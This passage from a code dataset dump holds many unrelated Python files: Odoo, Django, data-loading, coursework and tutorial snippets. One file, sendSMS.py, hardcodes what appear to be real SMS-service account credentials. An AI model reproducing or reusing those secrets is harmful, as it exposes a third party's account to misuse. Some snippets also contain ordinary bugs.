scan_key_map:\n\t\tPressKey(scan_key_map[key])\n\t\ttime.sleep(0.1)\n\t\tReleaseKey(scan_key_map[key])\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])","sub_path":"command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"130911643","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api,_\nimport odoo.addons.decimal_precision as dp\nfrom odoo.exceptions import UserError\nfrom odoo.tools.safe_eval import safe_eval\n\n\nclass PurchaseOrderInherite(models.Model):\n _inherit = \"purchase.order\"\n\n @api.model\n def create(self, vals):\n print(\"valsvals :: \",vals)\n if vals.get('name', 'New') == 'New':\n seq_date = None\n if 'date_order' in vals:\n seq_date = fields.Datetime.context_timestamp(self, fields.Datetime.to_datetime(vals['date_order']))\n print(\"vals['picking_type_id'] :::\" ,vals['picking_type_id'])\n deliver_to\t = self.env['stock.picking.type'].search([('id', '=', vals['picking_type_id'])], limit=1)\n\n v = self.env['ir.sequence'].next_by_code('purchase.order', sequence_date=seq_date) or '/'\n vals['name'] = str(deliver_to.warehouse_id.code) + '/' + v\n return super(PurchaseOrderInherite, self).create(vals)\n","sub_path":"nakham_change_seq/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"205674121","text":"import os\nimport glob\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom gt_parser import gt_parser\nimport config as cf\n\nDataset_Debug_Display = False\n\nclass DataLoader():\n def __init__(self, phase='Train', shuffle=False):\n self.datas = []\n self.last_mb = 0\n self.phase = phase\n self.gt_count = [0 for _ in range(cf.Class_num)]\n self.prepare_datas(shuffle=shuffle)\n \n def prepare_datas(self, shuffle=True):\n if self.phase == 'Train':\n dir_paths = cf.Train_dirs\n elif self.phase == 'Test':\n dir_paths = cf.Test_dirs\n \n print('------------\\nData Load (phase: {})'.format(self.phase))\n \n for dir_path in dir_paths:\n files = []\n for ext in cf.File_extensions:\n files += glob.glob(dir_path + '/Images/*' + ext) \n load_count = 0\n for img_path in files:\n if cv2.imread(img_path) is None:\n continue\n gt_path = get_gt_image_path(img_path, phase=self.phase)\n data = {'img_path': img_path,\n 'gt_path': gt_path,\n 'h_flip': False,\n 'v_flip': False,\n 'rotate': False\n }\n self.datas.append(data)\n load_count += 1\n gts = gt_parser(gt_path)\n for gt in gts:\n # plus 1 (background)\n label = gt[-1].astype(np.int)\n self.gt_count[label] += 1\n print(' - {} - {} datas -> loaded {}'.format(dir_path, len(files), load_count))\n\n self.display_gt_statistic()\n if self.phase == 'Train':\n self.data_augmentation()\n self.display_gt_statistic()\n self.set_index(shuffle=shuffle)\n \n def display_gt_statistic(self):\n print(' -*- Training label -*-')\n print(' Total data: {}'.format(len(self.datas)))\n for i, gt in enumerate(self.gt_count):\n print(' - {} : {}'.format(cf.Class_label[i], gt))\n\n def get_data_num(self):\n return self.data_n\n \n def set_index(self, shuffle=True):\n self.data_n = len(self.datas)\n self.indices = np.arange(self.data_n)\n if shuffle:\n np.random.seed(cf.Random_seed)\n np.random.shuffle(self.indices)\n\n def get_minibatch_index(self, shuffle=False):\n if self.phase == 'Train':\n mb = cf.Minibatch\n elif self.phase == 'Test':\n mb = 1\n _last = self.last_mb + mb\n if _last >= self.data_n:\n mb_inds = self.indices[self.last_mb:]\n self.last_mb = _last - self.data_n\n if shuffle:\n np.random.seed(cf.Random_seed)\n np.random.shuffle(self.indices)\n _mb_inds = self.indices[:self.last_mb]\n mb_inds = np.hstack((mb_inds, _mb_inds))\n else:\n mb_inds = self.indices[self.last_mb : self.last_mb+mb]\n self.last_mb += mb\n self.mb_inds = mb_inds\n\n \n def get_minibatch(self, shuffle=True):\n if self.phase == 'Train':\n mb = cf.Minibatch\n elif self.phase == 'Test':\n mb = 1\n self.get_minibatch_index(shuffle=shuffle)\n\n \n imgs = np.zeros((mb, cf.Height, cf.Width, 3), dtype=np.float32)\n #gts = np.zeros((mb, cf.Class_num), dtype=np.float32)\n \n max_height = 0\n max_width = 0\n \n for i, ind in enumerate(self.mb_inds):\n data = self.datas[ind]\n img, img_info = load_image(data['img_path'])\n \n resize_h = 1. * img_info[\"rh\"] / img_info[\"h\"]\n resize_w = 1. * img_info[\"rw\"] / img_info[\"w\"]\n\n gt = gt_parser(data['gt_path'])\n gt[:, 0:4:2] *= resize_w\n gt[:, 1:4:2] *= resize_h\n # Add one, background\n gt[:, -1] += 1\n\n img = image_augment(img, data)\n gt = gt_augment(gt, data, img_info[\"rh\"], img_info[\"rw\"])\n \n max_height = max(max_height, img_info[\"rh\"])\n max_width = max(max_width, img_info[\"rw\"])\n\n #imgs[i, :img_info[\"rh\"], :img_info[\"rw\"]] = img\n imgs = np.expand_dims(img, axis=0)\n gts = gt\n\n if Dataset_Debug_Display:\n print(data['img_path'], data['h_flip'])\n fig, ax = plt.subplots()\n ax.imshow(imgs[i])\n for bbox in gts:\n ax.add_patch(plt.Rectangle(xy=[bbox[0], bbox[1]],\n width=(bbox[2]-bbox[0]),\n height=(bbox[3]-bbox[1]), fill=False) )\n plt.show()\n\n if cf.Input_type == 'channels_first':\n imgs = imgs.transpose(0, 2, 3, 1)\n return imgs, gts, img_info\n\n\n def data_augmentation(self):\n print(' | -*- Data Augmentation -*-')\n if cf.Horizontal_flip:\n self.add_horizontal_flip()\n print(' | - Added horizontal flip')\n if cf.Vertical_flip:\n self.add_vertical_flip()\n print(' | - Added vertival flip')\n if cf.Rotate_ccw90:\n self.add_rotate_ccw90()\n print(' | - Added Rotate ccw90')\n print(' \\/')\n \n def add_horizontal_flip(self):\n new_data = []\n for data in self.datas:\n _data = data.copy()\n _data['h_flip'] = True\n new_data.append(_data)\n self.datas.extend(new_data)\n\n def add_vertical_flip(self):\n new_data = []\n for data in self.datas:\n _data = data.copy()\n _data['v_flip'] = True\n new_data.append(_data)\n self.datas.extend(new_data)\n\n def add_rotate_ccw90(self):\n new_data = []\n for data in self.datas:\n _data = data.copy()\n _data['rotate'] = True\n new_data.append(_data)\n self.datas.extend(new_data)\n\n\n\ndef get_gt_image_path(img_name, phase='Train'):\n gt_path = img_name.replace('Images', 'Annotations').split('.')[0] + '.txt'\n if os.path.exists(gt_path):\n return gt_path\n raise Exception(\"file not found >>\", gt_path)\n if phase == 'Train':\n gt_dirs = cf.GT_dirs\n elif phase == 'Test':\n gt_dirs = cf.Test_GT_dirs\n for gt_dir in gt_dirs:\n gt_path = os.path.join(gt_dir, file_name) + '.txt'\n if os.path.exists(gt_path):\n return gt_path\n raise Exception('file not found ->', gt_path)\n \n \n## Below functions are for data augmentation\ndef load_image(img_name):\n img = cv2.imread(img_name)\n if img is None:\n raise Exception('file not found: {}'.format(img_name)) \n h, w = img.shape[:2]\n \"\"\"\n if cf.Variable_input:\n longer_side = np.max(img.shape[:2])\n scaled_ratio = 1. * cf.Max_side / longer_side\n rh = np.min([img.shape[0] * scaled_ratio, cf.Max_side]).astype(np.int)\n rw = np.min([img.shape[1] * scaled_ratio, cf.Max_side]).astype(np.int)\n img = cv2.resize(img, (rw, rh))\n rrh = h / rh\n rrw = w / rw\n else:\n rh = cf.Height\n rw = cf.Width\n img = cv2.resize(img, (rw, rh))\n rrh = h / rh\n rrw = w / rw\n \"\"\"\n min_side = min(h, w)\n max_side = max(h, w)\n\n ratio = 1. * cf.Min_side / min_side\n max_s = max_side * ratio\n if max_s > cf.Max_side:\n ratio = 1. * cf.Max_side / max_side\n rw = int(ratio * w)\n rh = int(ratio * h)\n img = cv2.resize(img, (rw, rh))\n rrh = 1. / ratio\n rrw = 1. / ratio\n \n img = img[:, :, (2,1,0)]\n img = img / 255.\n img_info = {\"h\": h, \"w\": w, \"rh\":rh, \"rw\":rw, 'rrh':rrh, 'rrw':rrw}\n return img, img_info\n\n\ndef image_augment(image, data):\n if data['h_flip']:\n image = image[:, ::-1]\n if data['v_flip']:\n image = image[::-1, :]\n if data['rotate']:\n max_side = max(h, w)\n if len(image.shape) == 3:\n frame = np.zeros((max_side, max_side, 3), dtype=np.float32)\n elif len(image.shape) == 2:\n frame = np.zeros((max_side, max_side), dtype=np.float32)\n tx = int((max_side-w)/2)\n ty = int((max_side-h)/2)\n frame[ty:ty+h, tx:tx+w] = image\n M = cv2.getRotationMatrix2D((max_side/2, max_side/2), 90, 1)\n rot = cv2.warpAffine(frame, M, (max_side, max_side))\n image = rot[tx:tx+w, ty:ty+h]\n return image\n\n\ndef gt_augment(gt, data, h, w):\n if data['h_flip']:\n _gt = gt.copy()\n gt[:, 0] = w - _gt[:, 2]\n gt[:, 2] = w - _gt[:, 0]\n if data['v_flip']:\n _gt = gt.copy()\n gt[:, 1] = h - _gt[:, 3]\n gt[:, 3] = h - _gt[:, 1]\n return gt\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":8871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"36882022","text":"import requests\nfrom colorama import Fore, Back, Style\n\nGITHUB_RELEASE_URL = \"https://api.github.com/repos/skyzh/canvas_grab/releases/latest\"\nVERSION = \"v1.3.11\"\n\n\ndef check_latest_version():\n version_obj = {}\n print()\n try:\n version_obj = requests.get(GITHUB_RELEASE_URL, timeout=3).json()\n except Exception as e:\n print(f\"{Fore.RED}Failed to check update.{Style.RESET_ALL} It's normal if you don't have a stable network connection.\")\n print(f\"You may report the following message to developer: {e}\")\n return\n version = version_obj.get(\"tag_name\", \"unknown\")\n if version != VERSION:\n print(f\"You're using version {Fore.GREEN}{VERSION}{Style.RESET_ALL}, \"\n f\"but the latest release is {Fore.GREEN}{version}{Style.RESET_ALL}.\")\n print(f\"Please visit {Fore.BLUE}https://github.com/skyzh/canvas_grab/releases{Style.RESET_ALL} \"\n \"to download the latest version.\")\n print(version_obj.get(\"body\", \"\"))\n else:\n print(\"Just checked update. You're using latest version of canvas_grab. :)\")\n","sub_path":"version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"628494139","text":"# staticInferenceModule.py\n# ------------------------\n# Licensing Information: Please do not distribute or publish solutions to this\n# project. You are free to use and extend these projects for educational\n# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by\n# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html\n\nfrom util import *\nimport util\nimport random\nimport ghostbusters\n\nclass StaticInferenceModule:\n \"\"\"\n A static inference module must compute two quantities, conditioned on provided observations:\n \n -- The posterior distribution over ghost locations. This will be a distribution over tuples of\n where the ghosts are. If there is only one ghost, this distribution will be over the\n (singleton tuples of) the board locations. If there are two ghosts, this distribution will\n assign a probability to each pair of locations, and so on. Since the ghosts are interchangeable,\n the probability for, say, ((0,1), (3,2)) will be the same as that for ((3,2), (0,1)).\n \n -- The posterior distribution over the readings at a location, given the existing readings. Be\n careful that your computation does the right thing when the 'new' location is actually in the\n existing observations, at which point the posterior should put probability one of the known\n reading.\n\n This is an abstract class, which you should not modify.\n \"\"\"\n \n def __init__(self, game):\n \"\"\"\n Inference modules know what game they are reasoning about.\n \"\"\"\n self.game = game\n \n def getGhostTupleDistributionGivenObservations(self, observations):\n \"\"\"\n Compute the distribution over ghost tuples, given the evidence.\n \n Note that the observations are given as a dictionary.\n \"\"\"\n util.raiseNotDefined()\n \n def getReadingDistributionGivenObservations(self, observations, newLocation):\n \"\"\"\n Compute the distribution over readings for the new location, given the\n current observations (given as a dictionary).\n \"\"\"\n util.raiseNotDefined()\n\nclass ExactStaticInferenceModule(StaticInferenceModule):\n \"\"\"\n You will implement an exact inference module for the static ghostbusters game.\n \n See the abstract 'StaticInferenceModule' class for descriptions of the methods.\n \n The current implementation below is broken, returning all uniform distributions.\n \"\"\"\n \n def getGhostTupleDistributionGivenObservations(self, observations):\n \"\"\"\n Here is some help...\n self.game.getGhostTuples() will give you a list of ghost tuples\n self.game.getInitialDistribution() will give you a distribution over\n ghost tuples; namely if you say p = s.g.gID() and t is tuple from\n getGhostTuples, then p[t] will be its probability\n self.game.getReadingDistributionGivenGhostTuple(t,s) will give you\n a distribution over readings (red, green, etc.) for the ghost tuple\n t and sensor location s\n\n What you want to do is create a Counter() that you will return. If this\n counter is called dist, then dist[t] should be the probability of a\n ghost at tuple t (where t is from getGhostTuples) given the observations.\n \"\"\"\n \n #print observations\n #print ''\n \"*** YOUR CODE HERE ***\"\n possibleGhostTuples = self.game.getGhostTuples()\n initial = self.game.getInitialDistribution()\n #print initial\n #print ''\n \n dist = initial.copy()\n \n for observedLoc in observations.keys():\n observedReading = observations[observedLoc]\n #print observedLoc\n for possibleGhostTuple in possibleGhostTuples:\n #print possibleGhostTuple\n readingDist = self.game.getReadingDistributionGivenGhostTuple(possibleGhostTuple, observedLoc)\n #print readingDist\n dist[possibleGhostTuple] = dist[possibleGhostTuple]*readingDist[observedReading]\n #print ''\n \n #print ''\n \n dist.normalize()\n #print dist\n \n return dist\n\n\n\n def getReadingDistributionGivenObservations(self, observations, newLocation):\n \"\"\"\n For this part, you want to return a counter dist, so that \n dist[r] is the probability of reading r (from ghostbusters.Readings.getReadings)\n given the observations and the proposed new location.\n\n You'll probably want to use getReadingDistributionGivenGhostTuple (as before),\n your own getGhostTupleDistributionGivenObservations to compute these probabilities.\n To iterate over relevant things, there's ghostbusters.Readings.getReadings() to\n look at all possible readings.\n \"\"\"\n\n \"*** YOUR CODE HERE ***\"\n ghDist = self.getGhostTupleDistributionGivenObservations(observations)\n readings = ghostbusters.Readings.getReadings()\n possGhostTups = self.game.getGhostTuples()\n dist = Counter()\n\n probGh = ghDist[(newLocation,)]\n\n # We want to evaluate P(R_{i,j} | {r}), the probability of sensing\n # some reading given previous observations. Thus, we look at every\n # observation and evaluate this probability\n for r in readings:\n for loc in possGhostTups:\n readDist = self.game.getReadingDistributionGivenGhostTuple(loc, newLocation)\n dist[r] += readDist[r] * ghDist[(loc,)]\n\n dist.normalize()\n\n return dist\n","sub_path":"5300/bayesnets/staticInferenceModuleb.py","file_name":"staticInferenceModuleb.py","file_ext":"py","file_size_in_byte":5335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"407628450","text":"'''\n1- Faça um programa que cadastre 5 produtos em uma lista estática heterogênia.\n Para cada produto deve ser cadastrado o código, preço e quantidade. Criar a lista,\n lista esta, aplicar uma taxa de desconto sugerido pelo proprietário em todas os\n produtos da lista e apresentar a lista original e a lista com a taxa(%) de de\n desconto, apresentar para a lista original o produto mais barato e o produto com\n menor quantidade, e para a lista com desconto o produto mais caro e o produto\n de maior quantiade.\n'''\n\nquant = 3\nprodutos = []\nprodutos_desconto = []\n\nclass Produtos:\n def __init__(self, codigo=0, quantidade=0, preco=0.0):\n self.codigo = codigo\n self.quantidade = quantidade\n self.preco = preco\n\n def print_produto(self):\n print(f\"Codigo: {self.codigo}\\tQuantidade: {self.quantidade}\\tPreço: {self.preco}\\n\")\n\n\ndef cadastrar_produtos():\n for i in range(quant):\n produtos.append(Produtos(int(input(f\"Digite código produto{i + 1}: \")),\n int(input(f\"Digite quantidade produto{i + 1}: \")),\n float(input(f\"Digite preço produto{i + 1}: \"))))\n while not validar_codigo_produto(produtos[i].codigo, i):\n print(\"Código já existe!\")\n produtos[i].codigo = int(input(f\"Digite código produto{i + 1}: \"))\n print(\"\\n\")\n\n produtos_desconto.append(Produtos(produtos[i].codigo, produtos[i].quantidade, produtos[i].preco))\n\ndef validar_codigo_produto(codigo, range_i):\n for i in range(range_i):\n if produtos[i].codigo == codigo:\n return False\n return True\n\ndef printar_produtos(list_produtos):\n for i in range(quant):\n list_produtos[i].print_produto()\n\ndef get_taxa():\n taxa = float(input(\"Digite a taxa de desconto: \"))\n taxa /= 100\n return taxa\ndef aplicar_desconto():\n taxa = get_taxa()\n for i in range(quant):\n desconto = produtos_desconto[i].preco * taxa\n produtos_desconto[i].preco -= desconto\n\ndef achar_barato_caro_menor_maior():\n\n mais_caro = 0\n maior_quant = 0\n for i in range(quant):\n if produtos_desconto[i].preco > mais_caro:\n mais_caro = produtos_desconto[i].preco\n\n if produtos_desconto[i].quantidade > maior_quant:\n maior_quant = produtos_desconto[i].quantidade\n print(f\"Na lista produtos_desconto o produto mais caro tem o valor: {mais_caro}\")\n print(f\"Na lista produtos_desconto o produto maior quantidade tem: {maior_quant}\")\n print(\"\\n\")\n\n mais_barato = mais_caro+1\n menor_quant = maior_quant+1\n for i in range(quant):\n if produtos[i].preco < mais_barato:\n mais_barato = produtos[i].preco\n\n if produtos[i].quantidade < menor_quant:\n menor_quant = produtos[i].quantidade\n\n print(f\"Na lista produtos o produto mais barato tem o valor: {mais_barato}\")\n print(f\"Na lista produtos o produto menor quantidade tem: {menor_quant}\")\n\ncadastrar_produtos()\nprintar_produtos(produtos)\n\n\naplicar_desconto()\nprintar_produtos(produtos_desconto)\n\nachar_barato_caro_menor_maior()","sub_path":"exercicio-produto/produto.py","file_name":"produto.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"209989910","text":"from collections import deque\nfrom itertools import islice, chain, repeat\n\n\ndef window(numbers, n, *, fillvalue=None):\n if n == 0:\n return []\n\n inumbers = iter(numbers)\n window_ = deque(islice(chain(inumbers, repeat(fillvalue)), n), maxlen=n)\n yield tuple(window_)\n for num in inumbers:\n window_.append(num)\n yield tuple(window_)\n","sub_path":"pythonmorsels/window/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"111288605","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-01-18 09:12\n# Last modified: 2017-01-18 09:14\n# Filename: basic_feed.py\n# Description:\nimport tensorflow as tf\n\ninput1 = tf.placeholder(tf.float32)\ninput2 = tf.placeholder(tf.float32)\noutput = tf.mul(input1, input2)\n\nwith tf.Session() as sess:\n print(sess.run(output, feed_dict={input1:[7.], input2:[2.]}))\n","sub_path":"Machine Learning/Python/TensorFlow/basic_feed.py","file_name":"basic_feed.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"470543491","text":"\n\n#calss header\nclass _TRANSPIRE():\n\tdef __init__(self,): \n\t\tself.name = \"TRANSPIRE\"\n\t\tself.definitions = [u'If it transpires that something has happened, this previously secret or unknown fact becomes known: ', u'to happen: ', u'If a body or plant transpires, it loses water through its surface or skin.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_transpire.py","file_name":"_transpire.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"161459622","text":"#!/usr/bin/python3\nclass Square:\n \"\"\"this is a class Square that defines a square\n Attributes:\n __size: Private instance attribute - size of square\n Args:\n size: size of square.\n \"\"\"\n def __init__(self, size=0):\n \"\"\"This is a function that use __init__ method to\n initialize the passing variables\n\n Attributes:\n __size: Private instance attribute - size of square\n Args:\n size: size of square\n Raises:\n TypeError: size must be an integer\n ValueError: size must be >= 0\n \"\"\"\n if isinstance(size, int):\n if size >= 0:\n self.__size = size\n else:\n raise ValueError(\"size must be >= 0\")\n else:\n raise TypeError(\"size must be an integer\")\n\n def area(self):\n \"\"\" This is a function calculate the area of a square\n Attributes:\n __size: Private instance attribute - size of square\n Args:\n size: size of square\n Returns:\n the result\n \"\"\"\n return self.__size ** 2\n","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"564627532","text":"import io\nimport gzip\n\nfrom six import string_types as basestring\n\n\nGzipFile = _GzipFile = gzip.GzipFile\ntry:\n import idzip\n GzipFile = idzip.IdzipFile\n has_idzip = True\nexcept (ImportError, AttributeError):\n GzipFile = gzip.GzipFile\n has_idzip = False\n\n\n# Do not register idzip with psims, indexing seems to corrupt file\n# try:\n# from psims import compression as psims_compression\n\n# if has_idzip:\n# psims_compression.register(GzipFile, 'gz', b'\\037\\213')\n# psims_compression.register(GzipFile, 'dz', b'\\037\\213')\n# except ImportError:\n# pass\n\n\nDEFAULT_BUFFER_SIZE = int(2e6)\n\n\ndef test_gzipped(f):\n \"\"\"Checks the first two bytes of the\n passed file for gzip magic numbers\n\n Parameters\n ----------\n f : file-like or path-like\n\n Returns\n -------\n bool\n \"\"\"\n if isinstance(f, basestring):\n f = io.open(f, 'rb')\n current = f.tell()\n f.seek(0)\n magic = f.read(2)\n f.seek(current)\n return magic == b'\\037\\213'\n\n\ndef starts_with_gz_magic(bytestring):\n return bytestring.startswith(b'\\037\\213')\n\n\ndef get_opener(f, buffer_size=None):\n if buffer_size is None:\n buffer_size = DEFAULT_BUFFER_SIZE\n if not hasattr(f, 'read'):\n f = io.open(f, 'rb')\n buffered_reader = io.BufferedReader(f, buffer_size)\n if test_gzipped(f):\n handle = GzipFile(fileobj=buffered_reader, mode='rb')\n else:\n handle = buffered_reader\n return handle\n","sub_path":"ms_deisotope/data_source/_compression.py","file_name":"_compression.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"300556337","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.contrib.auth.models import BaseUserManager\nfrom django.utils.timezone import now\n\nclass UserManager(BaseUserManager):\n\n def create_user(self, username, email, name, password=None):\n \"\"\" Creacion nuevo usuario \"\"\"\n if not email:\n raise ValueError('Usuario debe tener Email')\n\n email = self.normalize_email(email)\n user = self.model(username=username, email=email, name=name)\n\n user.set_password(password)\n user.save(using=self._db)\n\n return user\n\n def create_superuser(self, username, email, name, password):\n \"\"\" Creacion super usuario \"\"\"\n user = self.create_user(username, email, name, password)\n\n user.is_superuser = True\n user.is_staff = True\n\n user.save(using=self._db)\n\n return user\n\nclass User(AbstractBaseUser, PermissionsMixin):\n\n username = models.CharField(\n max_length=150,\n unique=True\n )\n\n email = models.EmailField(\n max_length=255,\n unique=True\n )\n\n name = models.CharField(\n max_length=150\n )\n\n avatar = models.ImageField(\n verbose_name='Avatar',\n upload_to='users',\n null=True\n )\n\n is_active = models.BooleanField(\n default=True\n )\n\n is_staff = models.BooleanField(\n default=False\n )\n\n objects = UserManager()\n\n USERNAME_FIELD = 'username'\n REQUIRED_FIELDS = ['email','name']\n\n class Meta:\n verbose_name = 'Usuario'\n verbose_name_plural = 'Usuarios'\n\n def get_full_name(self):\n \"\"\" Obtener nombre completo \"\"\"\n return self.name\n\n def get_short_name(self):\n \"\"\" Obtener nombre corto \"\"\"\n return self.name\n\n def __str__(self):\n \"\"\" Retorna cadena representativa de usuario \"\"\"\n return self.get_full_name()\n\nclass DriverTrip( models.Model ):\n\n driver = models.ForeignKey(\n User,\n verbose_name='Conductor',\n on_delete=models.CASCADE)\n\n origen = models.CharField(\n verbose_name='Origen',\n max_length=500\n )\n\n destino = models.CharField(\n verbose_name='Destino',\n max_length=500\n )\n\n hora_salida = models.TimeField(\n verbose_name='Hora Salida'\n )\n\n fecha_salida = models.DateField(\n verbose_name='Fecha'\n )\n\n cantidad_pasajeros = models.IntegerField(\n verbose_name='Cantidad pasajeros',\n default=4\n )\n\n pasajeros = models.ManyToManyField(\n User,\n verbose_name='Pasajeros',\n related_name='usuario_pasajero'\n )\n\n class Meta:\n verbose_name = 'Viaje conductor'\n verbose_name_plural = 'Viajes conductores'\n","sub_path":"backend/api/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"411160975","text":"#coding=gbk\r\n\r\n#coding=utf-8\r\n\r\n#-*- coding: UTF-8 -*- \r\n\r\nfrom CCPRestSDK import REST\r\nimport ConfigParser\r\n\r\ndef sendTemplateSMS(to,datas,tempId):\r\n accountSid= '8a48b55150e162370150e6ad378825ac'; \r\n\r\n accountToken= 'c67a265e8ec14ff48bc14737a803d59e'; \r\n\r\n appId='8a48b55150e162370150e6ae3d5925c6'; \r\n\r\n serverIP='app.cloopen.com';\r\n\r\n serverPort='8883'; \r\n\r\n softVersion='2013-12-26';\r\n\r\n rest = REST(serverIP, serverPort, softVersion) \r\n rest.setAccount(accountSid, accountToken) \r\n rest.setAppId(appId)\r\n\r\n result = rest.sendTemplateSMS(to,datas,tempId) \r\n if result['statusCode'] == '000000':\r\n return True\r\n return False\r\n\r\n'''\r\nif __name__ == '__main__':\r\n sendTemplateSMS('15521057950', {'2', '8888'}, 1)\r\n'''","sub_path":"androidUtils/sendSMS.py","file_name":"sendSMS.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"32473966","text":"import re\nimport json\n\nfileOpen = open(\"doc_1.txt\", \"r\")\ntext = fileOpen.read()\n\nclass Citation:\n def __init__(self, title ,author, year):\n self.title = title\n self.author = author\n self.year = year\n\ncitations = re.split('\\n\\n',text)\n\ncitationList = []\nfor citation in citations:\n # get year\n year = re.findall('\\((?:19|20)[0-9][0-9]\\)',citation)\n authorCitation = re.split('\\((?:19|20)[0-9][0-9]\\)',citation)\n if len(year) == 0:\n authorCitation = re.split('[12]\\d{3}',citation) \n else:\n year = year[0][1:-1]\n\n # get author\n author = re.findall('[A-Z][A-Z|a-z]+\\,?\\s[A-Z][a-z]*\\s[A-Z][a-z]*\\.?|[A-Z][a-z]+\\,?\\s[A-Z][a-z]*\\.?|^[A-Z][a-z]+',authorCitation[0]) \n if len(author) > 1 :\n poped_item = 0\n for index in range(len(author)) :\n if ',' not in author[index-poped_item] and '.' not in author[index-poped_item]:\n author.pop(index-poped_item) \n poped_item +=1\n\n # get title\n title = re.findall('\\\".*\\\"', citation)\n if len(title) == 0 :\n if len(author) ==0 :\n title = re.findall('[A-Za-z,]{1,}\\s[A-Za-z, ]{0,}',authorCitation[0])[0] \n else:\n title = re.split(author[0], citation)[1]\n if ').' not in title :\n title = re.findall('[A-Za-z,]{1,}\\s[A-Za-z, ]{0,}[\\.]',title)\n title = title[0]\n else : \n title = title.split(').')[1]\n title = re.findall('[A-Za-z,]{1,}\\s[A-Za-z,: ]{0,}[\\.(]',title) \n title = title[0]\n else:\n title = title[0][1:-1] \n \n # Creat Citation\n citationList.append(Citation(title, author, year))\n\n#dictionary\ndict = []\nfor citation in citationList:\n if len(citation.year)>1:\n dict.append(\n {\n \"authors\": '; '.join(citation.author),\n \"title\": citation.title,\n \"year\": citation.year\n }\n )\n elif len(citation.year)==0 and len(citation.author)==0:\n dict.append(\n {\n \"title\": citation.title\n }\n )\n elif len(citation.year)==0:\n dict.append(\n {\n \"authors\": '; '.join(citation.author),\n \"title\": citation.title\n }\n )\n\nwith open('a_judul.json', 'w') as f:\n json.dump(dict, f)","sub_path":"Tugas1/T1_4a_Kevin&Tito.py","file_name":"T1_4a_Kevin&Tito.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"117904135","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myauth', '0006_auto_20151016_0405'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='myuser',\n name='mobile_no',\n field=models.CharField(default=9999999999, unique=True, max_length=10, validators=[django.core.validators.RegexValidator(regex=b'^\\\\d{10}$', message=b'Phone number must be exactly 10 digits')]),\n preserve_default=False,\n ),\n ]\n","sub_path":"myauth/migrations/0007_myuser_mobile_no.py","file_name":"0007_myuser_mobile_no.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"565053008","text":"# 这一课主要学习列表推导式和字典推导式\n\"\"\"\n上一个程序中,先定义字典,再遍历字典,显得有些不优雅。\n那么这节课学习列表推导式和字典推导式,来重写程序,让程序更优雅,更美观。\n推导式还是使用for循环,推导式是支持列表和字典的\n\"\"\"\n# 首先讲解列表推导式\n\n# 从1到10所有偶数的平方,并将其存到列表中\n# 定义一个列表\nalist = []\nfor i in range(1, 11):\n if i % 2 == 0:\n alist.append(i * i)\nprint(alist)\n\n# 优雅的列表写法,下面的就是列表推导式\nblist = [i * i for i in range(1, 11) if (i % 2) == 0]\nprint(blist)\n\nzodiac_name = (u\"水瓶座\", u\"双鱼座\", u\"白羊座\", u\"金牛座\", u\"双子座\",\n u\"巨蟹座\", u\"狮子座\", u\"处女座\", u\"天秤座\", u\"天蝎座\", u\"射手座\", u\"摩羯座\")\n# 字典推导式\n# 原式\nz_num = {}\nfor i in zodiac_name:\n z_num[i] = 0\n\nz_num = {i: 0 for i in 